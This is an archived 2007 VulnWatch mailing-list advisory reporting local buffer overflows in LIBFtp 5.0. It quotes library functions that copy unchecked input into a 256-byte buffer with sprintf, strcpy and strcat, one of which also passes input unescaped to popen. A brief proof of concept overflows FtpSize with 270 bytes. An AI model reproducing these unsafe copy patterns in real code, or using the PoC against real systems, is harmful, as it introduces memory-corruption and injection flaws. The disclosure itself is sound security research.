| To: | vulnwatch <vulnwatch@vulnwatch.org> |
|---|---|
| Subject: | [VulnWatch] LIBFtp 5.0 (sprintf(), strcpy()) Multiple local buffer overflow |
| From: | "starcadi starcadi" <starcadi@gmail.com> |
| Date: | Thu, 15 Mar 2007 20:43:09 +0100 |
| Delivered-to: | sp-com-lists@consult.net |
| Delivered-to: | vulnwatch-list@securepoint.com |
| Delivered-to: | mailing list vulnwatch@vulnwatch.org |
| Delivered-to: | moderator for vulnwatch@vulnwatch.org |
| Dkim-signature: | a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=Fi7CUggXTqBDeuXFCch1DM647ue7VQ/F9Pa5lA80iAhOonN7M/hPD3jULppIWOKD7dcCdrBtscKs7/XrAR1p2sdLrzE3t3ZNJBeStl6o3ZUW2gzlUNlD9mknOQdvzeGRvXf5Bl8rx+cKPtqzjDiaq9qvmYtiCFzIVoWhrTNyv5M= |
| Domainkey-signature: | a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=T0k//TiLdaJbMviS0kONw5c7eG54DxXxCdsgJuLY/h1cWFfUcdtzRnIOL3OOp970lGMA7AHzKXegTQxNXKO3tfftQy/XRAw/QaygMBIdOl2Pr6VFnE2nJSFSZxZXsJ1G5Qy3Yg38S6yWlQF3zuax3ONP0HClfntT53JC+8HaA6U= |
| List-help: | <mailto:vulnwatch-help@vulnwatch.org> |
| List-post: | <mailto:vulnwatch@vulnwatch.org> |
| List-subscribe: | <mailto:vulnwatch-subscribe@vulnwatch.org> |
| List-unsubscribe: | <mailto:vulnwatch-unsubscribe@vulnwatch.org> |
| Mailing-list: | contact vulnwatch-help@vulnwatch.org; run by ezmlm |
http://www.netsw.org/net/ip/filetrans/ftp/libftp/ Description the library has a multiple (sprintf(), strcpy()) buffer overflow in various functions. Source errors
fvuln = FtpArchie() FtpDebugDebug() FtpOpenDir() FtpSize()
the FtpString is a typedef of an array with 256bytes:
FtpLibrary.h: typedef char FtpString[256];
..
STATUS FtpChmod(FTP *ftp,char *file,int mode)
{
FtpString msg;
sprintf(msg,"SITE CHMOD %03o %s",mode,file);
return FtpCommand(ftp,msg,"",200,EOF);
}
..
int FtpArchie ( char *what, ARCHIE *result, int len)
{
FILE *archie;
FtpString cmd,tmp;
int i;
bzero(result,sizeof(result[0])*len);
sprintf(cmd,"archie -t -l -m %d %s",len,what);
if ((archie = popen(cmd,"r"))==NULL)
return 0;
..
STATUS FtpDebugDebug(FTP *ftp,int n, char * Message)
{
FtpString tmp;
strcpy(tmp,Message);
if (strncmp(tmp,"PASS ",5)==0)
{
char *p=tmp+5;
while ( *p != '\0') *p++='*';
};
..
STATUS FtpOpenDir(FTP * con,char * file)
{
FtpString command;
if ( file == NULL || *file == '\0' )
strcpy(command,"NLST");
else
sprintf(command,"NLST %s",file);
return FtpCommand(con,command,"",120,150,200,EOF);
}
..
int FtpSize(FTP * con, char *filename)
{
FtpString tmp;
int i,size;
strcpy(tmp,"SIZE ");
strcat(tmp,filename);
if ( FtpSendMessage(con,tmp) == QUIT )
return EXIT(con,QUIT);
..
POC
#include <FtpLibrary.h>
#define OVF_BUF (270)
int main()
{
char *buf;
buf = (char *) malloc(OVF_BUF+1);
memset(buf, 'A', OVF_BUF);
// insert function to init ftp connection..
// insert function to manage ftp connection..
// calling vulnerable function example FtpSize()
FtpSize(NULL, buf);
// insert function to close ftp connection..
return(0);
}
--
~ starcadi
|
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | [VulnWatch] QFTP (LIBFtp 3.1-1) (command line) sprintf() local buffer overflow, starcadi starcadi |
|---|---|
| Next by Date: | RE: [VulnWatch] iDefense Security Advisory 03.14.07: Trend Micro Antivirus UPX Parsing Kernel Divide by Zero Vulnerability, Topolski, Leo |
| Previous by Thread: | [VulnWatch] QFTP (LIBFtp 3.1-1) (command line) sprintf() local buffer overflow, starcadi starcadi |
| Next by Thread: | RE: [VulnWatch] iDefense Security Advisory 03.14.07: Trend Micro Antivirus UPX Parsing Kernel Divide by Zero Vulnerability, Topolski, Leo |
| Indexes: | [Date] [Thread] [Top] [All Lists] |